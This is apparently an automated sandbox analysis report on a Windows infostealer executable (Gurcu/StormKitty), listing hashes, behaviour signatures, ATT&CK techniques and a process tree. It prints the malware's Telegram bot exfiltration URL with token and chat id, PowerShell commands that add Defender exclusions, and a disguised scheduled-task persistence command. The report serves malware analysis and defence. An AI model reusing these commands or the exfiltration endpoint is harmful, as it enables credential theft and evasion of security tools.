Overview

overview

10

Static

static

3

150704149f...12.exe

windows7-x64

10

150704149f...12.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-08-2024 09:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    150704149f7e54c4f7cbdb776f33173979791bc0c625f42477815923d13f8712.exe

  • Size

    227KB

  • MD5

    1a83a244d9e90a4865aac14bc0e27052

  • SHA1

    d2b65e7aed7657c9915f90f03d46902087479753

  • SHA256

    150704149f7e54c4f7cbdb776f33173979791bc0c625f42477815923d13f8712

  • SHA512

    f4b9d26d8a0841f9425abf038f85563ddee65e2404bc508fd23c8023bb565fd7f0ceaeaadde49c4951d3bbbb93f6b64b3cf610464855a2bf2d418477dd4fe03f

  • SSDEEP

    6144:YzJS6VlWn4bk0+GIKSppY6sdeZywNeGC4xIAY9F:YzdVlHbk0X5SpppMVwfI

Score
10/10
gurcustormkittycollectioncredential_accessdiscoveryexecutionpersistenceprivilege_escalationspywarestealer

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7375773294:AAFZUnpXCxGuVizu2hOj5WMYl9ULnbeqZ6c/sendDocument?chat_id=5947406001&caption=====%20RL%20STEALER%20====%20%0A%E2%8F%B0%20Date%20=%3E%2008/19/2024%209:39%0A%F0%9F%92%BBSystem%20=%3E%20Windows%2010%20Pro%20(64%20Bit)%0A%F0%9F%91%A4%20User%20=%3E%20Admin%0A%F0%9F%86%94%20PC%20=%3E%20KZYBFHMK%0A%F0%9F%8F%B4%20Country%20=%3E%20[United%20Kingdom]%0A%F0%9F%94%8D%20IP%20=%3E%20194.110.13.70%0A%F0%9F%93%9D%20Language%20=%3E%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0A%F0%9F%94%93%20Antivirus%20=%3E%20Not%20installed%0A%20====%7B%20User%20Data%20%7D====%0A%F0%9F%93%82%20FileGrabber%20=%3E%2012%0A%F0%9F%93%A6%20Telegram%20=%3E%20%E2%9D%8C%0A%F0%9F%92%B8%20Wallets%20=%3E%20%E2%9D%8C%0A%F0%9F%92%AC%20Discord%20=%3E%20%E2%9D%8C%0A%F0%9F%93%A1%20FileZilla:%20%E2%9D%8C%0A%20VimeWorld%20=%3E%20%E2%9D%8C%0A%20====%7B%20VPN%20%7D====%0A%20%E2%88%9F%20NordVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20OpenVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20ProtonVPN%20=%3E%20%E2%9D%8C%0A%20====%7B%20Browsers%20Data%20%7D====%0A%F0%9F%97%9D%20Passwords%20=%3E%200%0A%F0%9F%95%91%20History%20=%3E%200%0A%F0%9F%8D%AA%20Cookies%20=%3E%200%0A%F0%9F%93%9D%20AutoFills%20=%3E%200%0A%F0%9F%92%B3%20CC%20=%3E%200%0A%20====%7B%20Gaming%20%7D====%0A%20%F0%9F%8E%AE%20Steam%20=%3E%20%E2%9D%8C%0A%20==================%0A%20DOMAINS%20DETECTED:%0A%20-%2

Signatures

  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

    stealergurcu
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • StormKitty

    StormKitty is an open source info stealer written in C#.

    stealerstormkitty
  • StormKitty payload 2 IoCs
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Event Triggered Execution: AppInit DLLs 1 TTPs

    Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.

    persistenceprivilege_escalation
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops desktop.ini file(s) 6 IoCs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies registry class 20 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\150704149f7e54c4f7cbdb776f33173979791bc0c625f42477815923d13f8712.exe
    "C:\Users\Admin\AppData\Local\Temp\150704149f7e54c4f7cbdb776f33173979791bc0c625f42477815923d13f8712.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:5004
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Client.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1064
    • C:\Users\Admin\AppData\Local\Temp\Client.exe
      "C:\Users\Admin\AppData\Local\Temp\Client.exe"
      2⤵
      • Modifies WinLogon for persistence
      • Executes dropped EXE
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:728
      • C:\Windows\SYSTEM32\CMD.exe
        "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3300
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:5040
    • C:\Users\Admin\AppData\Local\Temp\Launcher.exe
      "C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
      2⤵
      • Executes dropped EXE
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:3976
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\zzzz.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:724
    • C:\Users\Admin\AppData\Local\Temp\zzzz.exe
      "C:\Users\Admin\AppData\Local\Temp\zzzz.exe"
      2⤵
      • Executes dropped EXE
      • Accesses Microsoft Outlook profiles
      • Drops desktop.ini file(s)
      • System Location Discovery: System Language Discovery
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • outlook_office_path
      • outlook_win_path
      PID:4440
  • C:\Windows\system32\wbem\WmiApSrv.exe
    C:\Windows\system32\wbem\WmiApSrv.exe
    1⤵
    • Loads dropped DLL
    PID:4232

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Scheduled Task/Job

1
T1053

Scheduled Task

1
T1053.005

Persistence

Boot or Logon Autostart Execution

2
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Winlogon Helper DLL

1
T1547.004

Event Triggered Execution

1
T1546

AppInit DLLs

1
T1546.010

Scheduled Task/Job

1
T1053

Scheduled Task

1
T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

2
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Winlogon Helper DLL

1
T1547.004

Event Triggered Execution

1
T1546

AppInit DLLs

1
T1546.010

Scheduled Task/Job

1
T1053

Scheduled Task

1
T1053.005

Defense Evasion

Modify Registry

2
T1112

Credential Access

Credentials from Password Stores

1
T1555

Credentials from Web Browsers

1
T1555.003

Unsecured Credentials

2
T1552

Credentials In Files

2
T1552.001

Discovery

Browser Information Discovery

1
T1217

Query Registry

4
T1012

System Information Discovery

3
T1082

System Location Discovery

1
T1614

System Language Discovery

1
T1614.001

Lateral Movement

Collection

Data from Local System

2
T1005

Email Collection

1
T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\KZYBFHMK\Browsers\Firefox\Bookmarks.txt
    Filesize

    105B

    MD5

    2e9d094dda5cdc3ce6519f75943a4ff4

    SHA1

    5d989b4ac8b699781681fe75ed9ef98191a5096c

    SHA256

    c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142

    SHA512

    d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

    Download Submit

  • C:\Users\Admin\AppData\Local\KZYBFHMK\FileGrabber\Desktop\DebugBlock.docx
    Filesize

    373KB

    MD5

    ed97a78f0ead25192a8011302559a74b

    SHA1

    0ce861baa37020eb363540d074aefbed9af05288

    SHA256

    ac4e5f944abb053ae70c39eaf7bc61303d222b092adbd375aadf29c6197f32bd

    SHA512

    7a2c82c50c086cc239501bd642efe7f09f2f68d01650dbf0d2f73084a19d52dc6b45db727d77a7d51cdf0233621b74b432bf473588c13890d974cc038a8fd153

    Download Submit

  • C:\Users\Admin\AppData\Local\KZYBFHMK\FileGrabber\Desktop\InstallImport.png
    Filesize

    359KB

    MD5

    c720dc81392375b8fbb3b336ab4a0948

    SHA1

    1fa05cfb645f718488f3313d1af9cd3975da42e2

    SHA256

    5399a3f87d18afd7d109006b4f86726cd13b28f6f93d21b67df4a72faa2b3244

    SHA512

    ffaa320543e6b033fb3c89de4c086087a3cc9dad6e823dd0ae13b8130165a4e5b84b297a384ba2a0aeb1f999c6d92afe87786c98cc38f7b1429b51f18692cd79

    Download Submit

  • C:\Users\Admin\AppData\Local\KZYBFHMK\FileGrabber\Desktop\LockDeny.css
    Filesize

    517KB

    MD5

    f24a56dbaaf7c2f2e0cd1fc24f8f326d

    SHA1

    c61eb70395563bcab4ad5a46d240b0179011d575

    SHA256

    4edf21e65c84f08b1b6fb2b8b472d4bd62b6dc983bfc539ea98a033f9494cacd

    SHA512

    44c8fe3b7cded5f3afa64ca06779b517989d73c198f362535a2ba857b824b93252e3f85a63de0a6a0968e749fc2faa35fa6513ea0350dae06b473aaa4f4828fb

    Download Submit

  • C:\Users\Admin\AppData\Local\KZYBFHMK\FileGrabber\Documents\RemovePing.rtf
    Filesize

    2.3MB

    MD5

    087da719c2ed128148c0fdaed9190dc2

    SHA1

    96f5421fce586eed6336276fe05354733e1cc611

    SHA256

    fb461a8625030ef1e282b35dd8d2fa6756e032b5d50a1f7bbef472d2745e2a0d

    SHA512

    c13161edf975fc97817154911e6932f4856e59534bbd1010b199266bc6cb86f58ad94536554c8f50fd6ad27be2d70842dd06dac918bd26a8abb56dd9e6bdf343

    Download Submit

  • C:\Users\Admin\AppData\Local\KZYBFHMK\FileGrabber\Downloads\ApproveSync.svg
    Filesize

    1.0MB

    MD5

    0dc5d5efdd79e85ce873cc5bc6f6cb0d

    SHA1

    ccd40f8368f4c19aabf2ce909e997d7a0e81d61d

    SHA256

    a2c413affae741fe84990933c26f33f792c9434d91950ff47643e562535be553

    SHA512

    8850bc0644b7275b29201871014e52079e0638ff7690b9e14515b9c35e0c1dd0795edb96124e202df84edf0c28728208d5031c82a10a587e8cd0491d80e6bb20

    Download Submit

  • C:\Users\Admin\AppData\Local\KZYBFHMK\FileGrabber\Downloads\GetPing.bmp
    Filesize

    1.0MB

    MD5

    6d7f30fdad117f5239c32140474d805b

    SHA1

    16c6bf6ca540dcbe73484b79272a289089b3f00b

    SHA256

    6257859fc7f77a8bf03695a040776f64fd838a7f9d440cf2d43012621c11605f

    SHA512

    fade2614ef12a1654882f57331652b3dede2d7e2275a17b5c0090768c960ad642c5790ec6d3df57b975bb89f502f6de407d680e23f571f58184ee1216a2e97f6

    Download Submit

  • C:\Users\Admin\AppData\Local\KZYBFHMK\FileGrabber\Pictures\TraceRename.jpg
    Filesize

    1.1MB

    MD5

    905257abdd5116e5c24fc25ec0f8c855

    SHA1

    e21cd68b51d15df569484dab4dd369d090f21d1f

    SHA256

    eea9b1e6d2a7aade51d1e4cd745503d658e2499efdc33411289d6d1fef35d3e3

    SHA512

    93b8089badadd81bdb43c89788116dbf542b4763fa9ef00da639a63a583c399c32fb782a1b718f23ec5d991d083de5767f0f2b73f0ec52ca023e9dd69a60391d

    Download Submit

  • C:\Users\Admin\AppData\Local\KZYBFHMK\Process.txt
    Filesize

    4KB

    MD5

    8d30b357860b60f533b4e618f18bd7df

    SHA1

    e594542d4396f57342ff93c5356a0c02e9fbd02c

    SHA256

    cf153bb0400adc75cb36e38004030e2f6e757c583d913602b35ebf00c9519659

    SHA512

    5c54da67739d2c96d99ce4f38d418150781b9b359933142b61684de3b2868f9e83084d7e7e316a4ff77d1752b0c34412ae100841234dee5f0b1e49ee165cef77

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    d85ba6ff808d9e5444a4b369f5bc2730

    SHA1

    31aa9d96590fff6981b315e0b391b575e4c0804a

    SHA256

    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

    SHA512

    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    77d622bb1a5b250869a3238b9bc1402b

    SHA1

    d47f4003c2554b9dfc4c16f22460b331886b191b

    SHA256

    f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

    SHA512

    d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Client.exe
    Filesize

    100KB

    MD5

    21560cb75b809cf46626556cd5fbe3ab

    SHA1

    f2eec01d42a301c3caacd41cddb0ef2284dbb5a6

    SHA256

    d2525bab5cb322933c8978880975e0c189feece68ae3f1951bf46297c7f640fa

    SHA512

    21eac0037b16f968ee8743b52dc73efdd34d24c2502d090b399a552dc6cb75f7d3090c10d448c66b868b1c4a7c46a5068b084b88b487e40b1e755356cb7557db

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Launcher.exe
    Filesize

    22KB

    MD5

    4c8f3a1e15f370ca8afe2992902a6e98

    SHA1

    dc6324d924ac31bea4ad7e4dd6720ecdad3877dd

    SHA256

    dcdc72549f7ad41cc860738adbeee5e44f02222415fd84ed5c92538ac9049b92

    SHA512

    b63c4e48f3024edcf1e1391b5df6ff65fc5111849eb093b429fa0f21c03339dbaeff835f18e250758498f3432874b85348530e47b2ada93f6f68615a5ccf66c0

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_00wzxmkk.oc5.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\zzzz.exe
    Filesize

    320KB

    MD5

    de4824c195cf1b2bb498511ef461e49b

    SHA1

    f15ca6d0e02c785cce091dbd716cd43e3f5a80bd

    SHA256

    51813dfedbe02f03d08b4728187eadb4948d8be40c9d8fe6e4e1cb61fa7ae209

    SHA512

    b211a636f2799d90ce38348dbbc7dbc69ac5374129c7896a137f03a57fe78139a030c1edb90cfc4203799d77a8720df431da75986aa1d8b16274030ad1db770a

    Download Submit

  • C:\Windows\xdwd.dll
    Filesize

    136KB

    MD5

    16e5a492c9c6ae34c59683be9c51fa31

    SHA1

    97031b41f5c56f371c28ae0d62a2df7d585adaba

    SHA256

    35c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66

    SHA512

    20fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6

    Download Submit

  • memory/728-36-0x0000000000AA0000-0x0000000000AC0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/1064-14-0x00007FFFE4CD0000-0x00007FFFE5791000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1064-17-0x00007FFFE4CD0000-0x00007FFFE5791000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1064-13-0x00007FFFE4CD0000-0x00007FFFE5791000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1064-12-0x00007FFFE4CD0000-0x00007FFFE5791000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1064-11-0x00000139D7F70000-0x00000139D7F92000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4440-92-0x0000000006FF0000-0x0000000007594000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/4440-100-0x0000000006EC0000-0x0000000006F26000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4440-91-0x00000000069A0000-0x0000000006A32000-memory.dmp

    Filesize

    584KB

    Download

  • memory/4440-64-0x0000000000C50000-0x0000000000CA6000-memory.dmp

    Filesize

    344KB

    Download

  • memory/5004-0-0x00007FFFE4CD3000-0x00007FFFE4CD5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/5004-37-0x00007FFFE4CD0000-0x00007FFFE5791000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5004-63-0x00007FFFE4CD0000-0x00007FFFE5791000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5004-1-0x00000000000A0000-0x00000000000E0000-memory.dmp

    Filesize

    256KB

    Download